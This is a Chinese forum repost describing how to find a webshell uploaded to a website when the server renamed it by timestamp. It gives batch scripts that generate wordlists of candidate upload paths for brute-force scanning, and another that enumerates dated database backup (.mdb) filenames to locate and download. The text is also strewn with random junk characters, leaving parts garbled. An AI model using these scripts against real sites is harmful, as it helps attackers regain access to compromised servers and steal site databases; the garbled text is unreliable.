针对上传木马找不到名字的解决办法

admin

今天在一个人博客里面看到的，地址是：http://www.0xsec.com/?p=260

& |- |( H4 \+ H 感觉思路蛮好的，而且在t00ls也没有找到相关文章，我就转过来给大家瞧瞧！
+ y+ C* M$ r4 `: U9 V; k: k/ Q
——————————————————–
- J+ z7 X! J. ^) S7 B 有时 传了 木马上去后 直接是 xiaoma.asp
9 q" J7 y% t# [. W 还有种 是按照时间生成名字如201103091**************.asp
# ]4 y' E* P$ g1 q- d; D, S. } 下面这种如果又 没有回显的话 就可以做 个字典扫
' `9 l7 l  u" ~/ u- ?1 x5 U4 ~! Y 生成字典
/ o! S  `2 K9 q& h! F: F; S' }) ^: I uploadfile/2011/1/1/2011012847000000.asp
uploadfile/2011/1/1/2011012847000001.asp
" a3 ^% F) i" C uploadfile/2011/1/1/2011012847000002.asp
uploadfile/2011/1/1/2011012847000003.asp
7 P6 [2 h" p( H: r- r uploadfile/2011/1/1/2011012847000004.asp
——————————————————-
( `) g2 N3 J0 W 建议只 生成 上传 那1分种左右 如果你电脑 与网站服务器时间差距太大 就 多做点
@echo off
for %%a in (2011012847) do (
6 ^* }; ?. b8 N. y7 |, J. s+ N for %%o in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28) do (
, w4 t* W& T( y0 _1 F9 o; m; k- i& O9 { for %%b in (0 1 2 3 4 5 6 7 8 9) do (
# v4 H2 ^. R  D6 m for %%c in (0 1 2 3 4 5 6 7 8 9) do (
& P/ H1 _* R5 A+ W* B for %%d in (0 1 2 3 4 5 6 7 8 9) do (
3 }/ u$ y  @" _% m* r5 w" |( [" k for %%e in (0 1 2 3 4 5 6 7 8 9) do (
for %%f in (0 1 2 3 4 5 6 7 8 9) do (
for %%g in (0 1 2 3 4 5 6 7 8 9) do (
# _2 K1 E3 D) q# H echo uploadfile/2011/1/%%o/%%a%%b%%c%%d%%e%%f%%g.asp >>data.log
+ ]1 Y0 Q: n& F' @0 D- O$ A; {! r ))))))))
代码 如上 自己修改即可。 便有了小马的路径。方法不错。值得欣赏。
: L; B: r" K6 M! i- s2 t/ q0 w; C7 o$ P 由此思路修改可以针对数据库备份扫描。
恩不错，还可以写个时间备份数据库文件扫描
@echo off
7 s1 q7 _) e7 j. n+ S- d for %%a in (2007 2008 2009 2010) do (
for %%b in (1 2 3 4 5 6 7 8 9 10 11 12) do (
for %%c in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31) do (
! n6 m3 ?1 h% u. T echo databackup/%%a-%%b-%%c.mdb >>data.log
; p; d% x6 c5 Z0 L: G! o  q. U )))